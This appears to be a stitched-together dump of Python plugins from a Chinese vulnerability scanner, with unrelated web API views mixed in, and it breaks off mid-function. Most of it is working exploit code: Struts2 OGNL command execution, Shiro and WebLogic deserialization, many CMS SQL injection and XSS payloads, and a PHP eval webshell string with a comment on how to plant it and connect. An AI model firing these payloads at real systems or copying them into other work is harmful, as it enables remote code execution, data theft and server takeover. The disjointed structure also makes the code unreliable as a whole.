def medusa(Url, RandomAgent, Token, proxies=None):
proxies = Proxies().result(proxies)
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
data = '''class.classLoader.jarPath=%28%23context["xwork.MethodAccessor.denyMethodExecution"]%3d+new+java.lang.Boolean%28false%29%2c+%23_memberAccess["allowStaticMethodAccess"]%3dtrue%2c+%23a%3d%40java.lang.Runtime%40getRuntime%28%29.exec%28%27netstat -an%27%29.getInputStream%28%29%2c%23b%3dnew+java.io.InputStreamReader%28%23a%29%2c%23c%3dnew+java.io.BufferedReader%28%23b%29%2c%23d%3dnew+char[50000]%2c%23c.read%28%23d%29%2c%23sbtest%3d%40org.apache.struts2.ServletActionContext%40getResponse%28%29.getWriter%28%29%2c%23sbtest.println%28%23d%29%2c%23sbtest.close%28%29%29%28meh%29&z[%28class.classLoader.jarPath%29%28%27meh%27%29]'''
try:
payload_url = scheme + "://" + url + ":" + str(port) + "/index.action"
headers = {
'User-Agent': RandomAgent,
"Accept":
"application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*",
"Content-Type": "application/x-www-form-urlencoded"
}
resp = requests.post(payload_url,
headers=headers,
data=data,
proxies=proxies,
timeout=6,
verify=False)
con = resp.text
resilt = Result(con)
if resilt == "Linux" or resilt == "NoteOS" or resilt == "Windows":
Medusa = "{} 存在Struts2远程代码执行漏洞\r\n漏洞详情:\r\n版本号:S2-009\r\n返回数据:{}\r\n部署系统:{}\r\n".format(
url, con, resilt)
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url, Token).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),
str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def task(**kwargs):
DL=kwargs.get("DL")
payload_url=kwargs.get("payload_url")
key=kwargs.get("key")
url=kwargs.get("Url")
try:
encryptor = AES.new(base64.b64decode(key), kwargs.get("AES_MODE"), kwargs.get("AES_IV"))
base64_ciphertext = base64.b64encode(kwargs.get("AES_IV") + encryptor.encrypt(kwargs.get("file_body")))
cookies = {"jeesite.session.id": "3f8a61ec-27e2-425c-9724-f96ba0c1e512",
"rememberMe": base64_ciphertext.decode()}
resp=requests.get(payload_url, cookies=cookies, proxies=kwargs.get("proxies"), timeout=6, verify=False)
time.sleep(3)
if DL.result():
Medusa = "{} 存在ShiroRememberMe反序列化命令执行漏洞(CVE-2016-4437)\r\n验证数据:\r\n漏洞位置:{}\r\n秘钥:{}\r\nHeaders请求头:{}\r\nDNSLOG请求值:{}\r\nDNSLOG数据:{}\r\n".format(
url, payload_url, key, cookies, DL.dns_host(), DL.dns_text())
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, resp, **kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url), str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e) # 调用写入类传入URL和错误插件名
def ActiveScanListQuery(request): #主动扫描列表查询
RequestLogRecord(request, request_api="active_scan_list_query")
if request.method == "POST":
try:
UserToken = json.loads(request.body)["token"]
Uid = UserInfo().QueryUidWithToken(UserToken) # 如果登录成功后就来查询用户名
if Uid != None: # 查到了UID
UserOperationLogRecord(request,
request_api="active_scan_list_query",
uid=Uid)
ActiveScanListQueryResult = ActiveScanList().Query(uid=Uid)
if ActiveScanListQueryResult != None:
return JsonResponse({
'message': ActiveScanListQueryResult,
'code': 200,
})
else:
return JsonResponse({
'message': '数据库出问题了🐈',
'code': 404,
})
else:
return JsonResponse({
'message': "小宝贝这是非法查询哦(๑•̀ㅂ•́)و✧",
'code': 403,
})
except Exception as e:
ErrorLog().Write(
"Web_BasicFunctions_VulnerabilityQuery_ActiveScanListQuery(def)",
e)
return JsonResponse({
'message': '莎酱被玩坏啦(>^ω^<)喵',
'code': 169,
})
else:
return JsonResponse({
'message': '请使用Post请求',
'code': 500,
})
def medusa(Url,RandomAgent,Token,proxies=None):
proxies=Proxies().result(proxies)
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
rm = "MedusaTextPoc" + randoms().result(20) # 获取随机数
payload_shell = "/ispirit/interface/gateway.php?<?php @eval($_POST[pass]);?>"
payload_rm=rm + "MedusaScanTestPoc"
payload_test = "/ispirit/interface/gateway.php?"+payload_rm
#会把问好后面的内容写入到oa.access.log文件中,可以自定义文件
payload = "/ispirit/interface/gateway.php?json={}&url=../../ispirit/../../nginx/logs/oa.access.log"
payload_url = scheme + "://" + url + ":" + str(port) + payload
payload_test_url = scheme + "://" + url + ":" + str(port) + payload_test
headers = {
'User-Agent': RandomAgent,
"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate"
}
#把随机数写到log文件中想要写入木马把payload_test替换成payload_shell即可,用菜刀连接payload_url这个连接即可,需要改成GBK
resp = requests.get(payload_test_url , headers=headers, proxies=proxies,timeout=6, verify=False)
#请求文件查看是否成功,是否写入
resp2 = requests.get(payload_url , headers=headers, proxies=proxies,timeout=6, verify=False)
con = resp2.text
code2 = resp2.status_code
code = resp.status_code
if code == 200 and code2==200 and con.find(rm) != -1:
Medusa = "{}存在通达OA任意文件上传和文件包含漏洞\r\n验证数据:\r\n读取文件位置:{}\r\n文件返回内容:{}\r\n".format(url,payload_url, con)
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url, Token).Write() # 传入url和扫描到的数据
WriteFile().result(str(url), str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, Token, proxies=None):
proxies = Proxies().result(proxies)
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
payload = "/?m=message&a=show&uid=yu%27%29%20union%20select%20md5%28c%29%20limit%201,1%23"
payload_url = scheme + "://" + url + ":" + str(port) + payload
headers = {
'User-Agent':
RandomAgent,
'Content-Type':
'application/x-www-form-urlencoded',
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
}
resp = requests.get(payload_url,
headers=headers,
proxies=proxies,
timeout=6,
verify=False)
con = resp.text
code = resp.status_code
if code == 200 and con.find("4a8a08f09d37b73795649038408b5f33") != -1:
Medusa = "{}存在EasyTalkSQL注入漏洞\r\n 验证数据:\r\nUrl:{}\r\n返回结果:{}\r\n".format(
url, payload_url, con)
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url, Token).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),
str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url: str, RandomAgent: str, proxies: str = None, **kwargs) -> None:
if proxies != None:
proxies_scheme, proxies_url, proxies_port = UrlProcessing().result(
proxies)
socks.set_default_proxy(socks.HTTP,
addr=proxies_url,
port=proxies_port) # 设置socks代理
socket.socket = socks.socksocket # 把代理应用到socket
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(60)
payload = 'aced0005737d00000001001a6a6176612e726d692e72656769737472792e5265676973747279787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707372002d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e766f636174696f6e48616e646c657200000000000000020200007872001c6a6176612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e03000078707732000a556e696361737452656600093132372e302e302e3100000000000000006ed6d97b00000000000000000000000000000078'
server_addr = (url, port)
t3handshake(sock, server_addr)
buildT3RequestObject(sock)
rs, poc = sendEvilObjData(sock, payload)
con = re.findall('\\$Proxy[0-9]+', str(rs), re.S)
if len(con) > 0:
Medusa = "{}存在Weblogic反序列化命令执行漏洞(CVE-2017-3248)\r\n验证数据:\r\n使用POC:{}\r\n返回数据包:{}\r\n正则数据:{}\r\n".format(
url, poc, str(rs), con)
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,
**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),
str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url,
e) # 调用写入类传入URL和错误插件名
def medusa(**kwargs) -> None:
url = kwargs.get("Url") # 获取传入的url参数
Headers = kwargs.get("Headers") # 获取传入的头文件
proxies = kwargs.get("Proxies") # 获取传入的代理参数
DL = Dnslog()
con = ""
global resp
try:
payload_url = url
Headers[
"Content-Type"] = "%{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='ping " + DL.dns_host(
) + "').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"
try: #防止在linux系统上执行了POC,导致超时扫描不到漏洞
resp = requests.post(payload_url,
headers=Headers,
timeout=6,
proxies=proxies,
verify=False)
con = resp.text
except:
pass
time.sleep(2)
if DL.result():
Medusa = "{} 存在Struts2远程代码执行漏洞(S2-045)\r\n漏洞详情:\r\n版本号:S2-045\r\n使用EXP:{}\r\n返回数据:{}\r\n返回DNSLOG数据:{}\r\n使用DNSLOG:{}\r\n".format(
url, resp.request.headers, con, DL.dns_text(), DL.dns_host())
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, resp,
**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),
str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url,
e) #调用写入类
def medusa(Url, RandomAgent, UnixTimestamp):
scheme, url, port = UrlProcessing(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
payload = "/ad_js.php?ad_id=1%20and%201=2%20union%20select%201,2,3,4,5,md5(3.1415),md5(3.1415)"
payload_url = scheme + "://" + url + ":" + str(port) + payload
headers = {
'User-Agent':
RandomAgent,
'Content-Type':
'application/x-www-form-urlencoded',
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
}
s = requests.session()
resp = s.get(payload_url, headers=headers, timeout=6, verify=False)
con = resp.text
code = resp.status_code
if con.find("63e1f04640e83605c1d177544a5a0488") != -1:
Medusa = "{}存在BlueCMSSQL注入漏洞\r\n 验证数据:\r\nUrl:{}\r\n返回内容:{}\r\n".format(
url, payload_url, con)
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,
UnixTimestamp).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),
str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, Token, proxies=None):
proxies = Proxies().result(proxies)
scheme, url, port = UrlProcessing(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
payload = "/plus/ajax_officebuilding.php?act=key&key=asd%E9%94%A6%27%20uniounionn%20selselectect" + "%201,2,3,md5(7836457),5,6,7,8,9%23"
payload_url = scheme + "://" + url + ":" + str(port) + payload
headers = {
'User-Agent':
RandomAgent,
'Content-Type':
'application/x-www-form-urlencoded',
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
}
resp = requests.get(payload_url,
headers=headers,
timeout=6,
proxies=proxies,
verify=False)
con = resp.text
code = resp.status_code
if code == 200 and con.find('3438d5e3ead84b2effc5ec33ed1239f5') != -1:
Medusa = "{}存在74CMS存在SQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(
url, payload_url, con)
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url, Token).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),
str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def HomepageDefaultData(request): #用户登录成功后跳转的首页,默认数据
RequestLogRecord(request, request_api="homepage_default_data")
if request.method == "POST":
try:
UserToken = json.loads(request.body)["token"]
Uid = UserInfo().QueryUidWithToken(UserToken) # 如果登录成功后就来查询用户名
if Uid != None: # 查到了UID
UserOperationLogRecord(request,
request_api="homepage_default_data",
uid=Uid)
DefaultData = HomeInfo().DefaultData(uid=Uid)
if DefaultData == None:
return JsonResponse({
'message': "想啥呢?不知道查询出问题了吗?",
'code': 404,
})
else:
return JsonResponse({
'message': DefaultData,
'code': 200,
})
else:
return JsonResponse({
'message': "小宝贝这是非法查询哦(๑•̀ㅂ•́)و✧",
'code': 403,
})
except Exception as e:
ErrorLog().Write(
"Web_BasicFunctions_Home_HomepageDefaultData(def)", e)
return JsonResponse({
'message': '呐呐呐!莎酱被玩坏啦(>^ω^<)',
'code': 169,
})
else:
return JsonResponse({
'message': '请使用Post请求',
'code': 500,
})
def medusa(Url: str, Headers: dict, proxies: str = None, **kwargs) -> None:
proxies = Proxies().result(proxies)
scheme, url, port = UrlProcessing(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
payload = "/plus/ajax_officebuilding.php?act=key&key=asd%錦%27%20uniounionn%20selselectect%201,2,3,md5(7836457),5,6,7,8,9%23"
payload_url = scheme + "://" + url + ":" + str(port) + payload
Headers['Content-Type'] = 'application/x-www-form-urlencoded'
Headers[
'Accept'] = 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
resp = requests.get(payload_url,
headers=Headers,
timeout=6,
proxies=proxies,
verify=False)
con = resp.text
code = resp.status_code
if con.find('3438d5e3ead84b2effc5ec33ed1239f5') != -1:
Medusa = "{}存在74CMS存在SQL注入漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(
url, payload_url, con)
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,
**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),
str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url,
e) #调用写入类
def medusa(**kwargs) -> None:
url = kwargs.get("Url") # 获取传入的url参数
Headers = kwargs.get("Headers") # 获取传入的头文件
proxies = kwargs.get("Proxies") # 获取传入的代理参数
try:
rm = "Medusa" + randoms().result(5)
payload = "/?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('{}.php','<?php phpinfo(); ?>')</php>".format(
rm)
payload_url2 = url + "/" + rm + ".php"
payload_url = url + payload
resp = requests.get(payload_url,
headers=Headers,
timeout=6,
proxies=proxies,
verify=False)
if resp.status_code == 200:
resp2 = requests.get(payload_url2,
headers=Headers,
timeout=6,
proxies=proxies,
verify=False)
con = resp2.text
code = resp2.status_code
if code == 200 and con.find("PHP Version") != -1 and con.find(
"System") != -1 and con.find("Build Date") != -1:
Medusa = "{}存在Thinkcmf任意命令执行漏洞\r\n验证数据:\r\n漏洞位置:{}\r\n写入文件位置:{}\r\n返回值:{}\r\n".format(
url, payload_url, payload_url2, con)
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, resp,
**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),
str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url,
e) #调用写入类
def medusa(Url: str, Headers: dict, proxies: str = None, **kwargs) -> None:
proxies = Proxies().result(proxies)
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
rm = randoms().result(20)
payload = "/index.php?s=/admin/articlem/insert/navTabId/listarticle/callbackType/closeCurrent"
data = '''tid=&title=%3Cimg+src%3Dx+onerror%3Dalert({})%3E&keyword=cscanpoc&ispush=0&iscommend=1&isslides=0&islock=0&summary=cscanpoc&content=%09%09%09%09%09cscanpoc'''.format(
rm)
payload_url = scheme + "://" + url + ":" + str(port) + payload
resp = requests.post(payload_url,
headers=Headers,
data=data,
proxies=proxies,
timeout=6,
verify=False)
con = resp.text
code = resp.status_code
if code == 200 and con.find(
"<td><img src=x onerror=alert({})></td>".format(rm)) != -1:
Medusa = "{}存在EasyCMS跨站脚本漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format(
url, payload_url, con)
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,
**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),
str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url,
e) #调用写入类
def medusa(Url, RandomAgent, Token, proxies=None):
proxies = Proxies().result(proxies)
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
payload = "/index.php"
payload_url = scheme + "://" + url + ":" + str(port) + payload
headers = {
'User-Agent': RandomAgent,
'Content-Type': 'application/x-www-form-urlencoded',
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'cookie': 'sort_field_idx=1=extractvalue(1,concat(0x5c,md5(1)))'
}
s = requests.session()
resp = s.post(payload_url,
headers=headers,
timeout=6,
proxies=proxies,
verify=False)
con = resp.text
code = resp.status_code
if code == 200 and con.find("c4ca4238a0b923820dcc509a6f75849") != -1:
Medusa = "{}存在EasethinkCookie注入漏洞\r\n 验证数据:\r\nUrl:{}\r\n返回结果:{}\r\n".format(
url, payload_url, con)
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url, Token).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),
str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url,RandomAgent,proxies=None,**kwargs):
proxies=Proxies().result(proxies)
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
Payloads = [
"/Bulletin/QAList.aspx?infoflowId=",
"/Bulletin/PolicyDownLoad.aspx?ID=",
"/Bulletin/PolicyList.aspx?infoflowId=",
"/login/TransactList.aspx?ItemName=1"
]
for payload in Payloads:
try:
data = "%27and/**/1=sys.fn_varbintohexstr(hashbytes(%27MD5%27,%271234%27))--"
payload_url = scheme + "://" + url +":"+ str(port)+ payload + data
headers = {
'User-Agent': RandomAgent,
'Content-Type': 'application/x-www-form-urlencoded',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
"Accept-Encoding": "gzip, deflate",
}
resp = requests.get(payload_url,headers=headers,proxies=proxies, timeout=6, verify=False)
con = resp.text
code = resp.status_code
if code==200 and con.find("81dc9bdb52d04dc20036dbd8313ed055") != -1 :
Medusa = "{}存在ECGAPSQL注入漏洞\r\n 验证数据:\r\nUrl:{}\r\n返回结果:{}\r\n".format(url,payload_url,con)
_t=VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url), str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)#调用写入类
def medusa(Url, RandomAgent, UnixTimestamp):
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
Payloads = [
"/cmstop/apps/system/view/template/edit.php",
"/apps/system/view/template/edit.php"
]
for payload in Payloads:
try:
payload_url = scheme + "://" + url + ":" + str(port) + payload
headers = {
'User-Agent':
RandomAgent,
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
}
resp = requests.get(payload_url,
headers=headers,
timeout=6,
verify=False)
con = resp.text
if con.find(' in <b>([^<]+)</b> on line <b>(\\d+)</b>') != -1:
Medusa = "{}存在CmsTop文件路径漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(
url, payload_url, con)
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,
UnixTimestamp).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),
str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def Login(request): #用户登录,每次登录成功都会刷新一次Token
RequestLogRecord(request, request_api="login")
if request.method == "POST":
try:
Username = json.loads(request.body)["username"]
Passwd = json.loads(request.body)["passwd"]
UserLogin = UserInfo().UserLogin(Username, Passwd)
if UserLogin is None:
return JsonResponse({
'message': '账号或密码错误',
'code': 604,
})
else:
while True: #如果查询确实冲突了
Token = randoms().result(250)
QueryTokenValidity = UserInfo().QueryTokenValidity(
Token) #用来查询Token是否冲突了
if not QueryTokenValidity: #如果不冲突的话跳出循环
break
UpdateToken = UserInfo().UpdateToken(name=Username,
token=Token) #接着更新Token
if UpdateToken: #如果更新成功了
Uid = UserInfo().QueryUidWithToken(Token) # 查询UID
UserOperationLogRecord(request,
request_api="login",
uid=Uid)
return JsonResponse({
'message': Token,
'code': 200,
})
except Exception as e:
ErrorLog().Write("Web_Api_User_LogIn(def)", e)
else:
return JsonResponse({
'message': '请使用Post请求',
'code': 500,
})
def medusa(Url, RandomAgent, Token, proxies=None):
proxies = Proxies().result(proxies)
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
rm = randoms().result(20)
payload = "/admin.php?p=1%22%3E%3Cscript%3Ealert%28/{}/%29%3C/script%3E".format(
rm)
payload_url = scheme + "://" + url + ":" + str(port) + payload
headers = {
'User-Agent':
RandomAgent,
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
}
resp = requests.get(payload_url,
headers=headers,
timeout=6,
proxies=proxies,
verify=False)
con = resp.text
code = resp.status_code
if code == 200 and con.find(">alert(/{}/)".format(rm)) != -1:
Medusa = "{}存在EcoCMS跨站脚本漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(
url, payload_url, con)
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url, Token).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),
str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, proxies=None, **kwargs):
proxies = Proxies().result(proxies)
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
payload = '/pf/rate.php?id=-1+UNION+ALL+SELECT+NULL,CONCAT(0x23,0x747971,0x23)--'
payload_url = scheme + "://" + url + ":" + str(port) + payload
headers = {
'User-Agent':
RandomAgent,
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
}
resp = requests.get(payload_url,
headers=headers,
timeout=6,
proxies=proxies,
verify=False)
con = resp.text
code = resp.status_code
if code == 200 and con.find("#tyq#") != -1:
Medusa = "{}存在EmpireCMSSQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(
url, payload_url, con)
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,
**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),
str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, Token, proxies=None):
proxies = Proxies().result(proxies)
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
payload = "/subscribe.php?act=unsubscribe&code=YScgYW5kKHNlbGVjdCAxIGZyb20oc2VsZWN0IGNvdW50KCopLGNvbmNhdCgoc2VsZWN0IChzZWxlY3QgKHNlbGVjdCBjb25jYXQoMHg3ZSxtZDUoNjY2KSwweDdlKSkpIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLnRhYmxlcyBsaW1pdCAwLDEpLGZsb29yKHJhbmQoMCkqMikpeCBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgZ3JvdXAgYnkgeClhKSM="
payload_url = scheme + "://" + url + ":" + str(port) + payload
headers = {
'User-Agent':
RandomAgent,
'Content-Type':
'application/x-www-form-urlencoded',
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
}
resp = requests.get(payload_url,
headers=headers,
timeout=6,
proxies=proxies,
verify=False)
con = resp.text
code = resp.status_code
if code == 200 and con.find("fae0b27c451c728867a567e8c1bb4e53") != -1:
Medusa = "{}存在YiXiangSQL注入漏洞\r\n 验证数据:\r\nUrl:{}\r\n返回结果:{}\r\n".format(
url, payload_url, con)
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url, Token).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),
str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, proxies=None, **kwargs):
proxies = Proxies().result(proxies)
scheme, url, port = UrlProcessing().result(Url)
if port is None and scheme == 'https':
port = 443
elif port is None and scheme == 'http':
port = 80
else:
port = port
try:
sql = "SELECT md5('testvul') as administratorsName"
payload = "/Export/Export.log.inc.php?ExportSQL=" + urllib.parse.quote(
base64.b64encode(sql.encode('utf-8')).decode('ascii'))
payload_url = scheme + "://" + url + ":" + str(port) + payload
headers = {
'User-Agent':
RandomAgent,
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
}
resp = requests.get(payload_url,
headers=headers,
timeout=6,
proxies=proxies,
verify=False)
con = resp.text
if con.find("e87ebbaed6f97f26e222e030eddbad1c") != -1:
Medusa = "{}存在EnableQSQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format(
url, payload_url, con)
_t = VulnerabilityInfo(Medusa)
VulnerabilityDetails(_t.info, url,
**kwargs).Write() # 传入url和扫描到的数据
WriteFile().result(str(url),
str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ErrorHandling().Outlier(e, _)
_l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, ProxyIp):
